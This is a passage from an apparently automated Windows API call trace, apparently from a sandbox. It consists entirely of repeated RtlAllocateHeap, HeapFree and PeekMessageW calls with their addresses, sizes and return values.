Size=0x20) returned 0xc1e078 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bf8 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bc8 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1b048 [0245.439] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e0a0 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c28 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21898 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9be0 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b80 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218a8 [0245.439] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218a8 | out: hHeap=0xbe0000) returned 1 [0245.439] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b80 | out: hHeap=0xbe0000) returned 1 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218a8 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xc22880 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218b8 [0245.440] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218c8 [0245.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b80 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b20 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218c8 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218d8 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b38 [0245.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218d8 | out: hHeap=0xbe0000) returned 1 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218d8 [0245.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218d8 | out: hHeap=0xbe0000) returned 1 [0245.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b20 | out: hHeap=0xbe0000) returned 1 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc63888 [0245.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b38 | out: hHeap=0xbe0000) returned 1 [0245.440] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218d8 [0245.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218d8 | out: hHeap=0xbe0000) returned 1 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b38 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b20 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0245.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218d8 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218e8 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b08 [0245.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218e8 | out: hHeap=0xbe0000) returned 1 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218e8 [0245.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218e8 | out: hHeap=0xbe0000) returned 1 [0245.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1b0d8 [0245.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b08 | out: hHeap=0xbe0000) returned 1 [0245.441] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218e8 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b08 [0245.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218e8 | out: hHeap=0xbe0000) returned 1 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e0c8 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218e8 [0245.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e0f0 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ac0 [0245.441] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.441] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e118 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b08 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218f8 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21908 [0245.442] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21908 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e140 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d30 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21918 [0245.442] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21918 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d00 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.442] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.442] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ce8 [0245.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.443] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c40 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.443] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.443] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d00 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.443] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d78 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.443] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.443] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ce8 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.444] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d48 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.444] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.444] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d00 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.444] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d30 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.444] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.445] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ce8 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.445] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c40 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.445] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.445] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d00 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.445] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d78 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.446] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.446] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ce8 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.446] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d48 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.446] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.446] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d00 [0245.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.446] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d60 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d30 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21928 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d48 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21948 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21938 [0245.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e190 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.447] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.448] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: 